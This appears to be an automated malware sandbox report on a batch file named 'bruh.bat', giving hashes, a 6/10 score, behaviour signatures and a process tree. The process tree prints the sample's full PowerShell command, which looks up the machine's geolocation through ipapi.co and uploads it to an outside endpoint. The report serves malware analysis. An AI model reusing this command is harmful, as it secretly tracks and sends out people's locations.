Analysis
-
max time kernel
26s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
11-09-2024 11:54
Static task
static1
Behavioral task
behavioral1
Sample
bruh.bat
Resource
win7-20240708-en
windows7-x64
4 signatures
1800 seconds
Behavioral task
behavioral2
Sample
bruh.bat
Resource
win10v2004-20240802-en
windows10-2004-x64
6 signatures
1800 seconds
Behavioral task
behavioral3
Sample
bruh.bat
Resource
win11-20240802-en
windows11-21h2-x64
6 signatures
1800 seconds
General
-
Target
bruh.bat
-
Size
671B
-
MD5
1c32fa7fbaee5d15ef10fdbf167b3ec6
-
SHA1
1cc67c4a19f02f257ff4a3c8cb2e6cd6553d0f67
-
SHA256
3577e5f444a78a059b641b2bd93b778d8027fdba8192597e0926fa0b7c4f3060
-
SHA512
66d3993cdcd2e0dd23b8f0dd7ac0b70b8da0ee24fe097f4fb301251032c1c00696805b30d3fbfd200bd56a5bf606c9bab685c7553a9cb08c258d10667987da87
Score
6/10
Malware Config
Signatures
-
pid Process 2704 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2704 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2704 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2848 wrote to memory of 2704 2848 cmd.exe 31 PID 2848 wrote to memory of 2704 2848 cmd.exe 31 PID 2848 wrote to memory of 2704 2848 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\bruh.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { $client = new-object System.Net.WebClient; $location = (Invoke-RestMethod -Uri 'https://ipapi.co/json/'); $message = 'Current location: ' + $location.city + ', ' + $location.region + ', ' + $location.country + ' (' + $location.latitude + ', ' + $location.longitude + ')'; $client.UploadString('', '[$message]($location.url)'); Start-Sleep -Seconds 5; $client = new-object System.Net.WebClient; $message = 'Test message from PowerShell'; $client.UploadString('', '[$message]()'); }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2704
-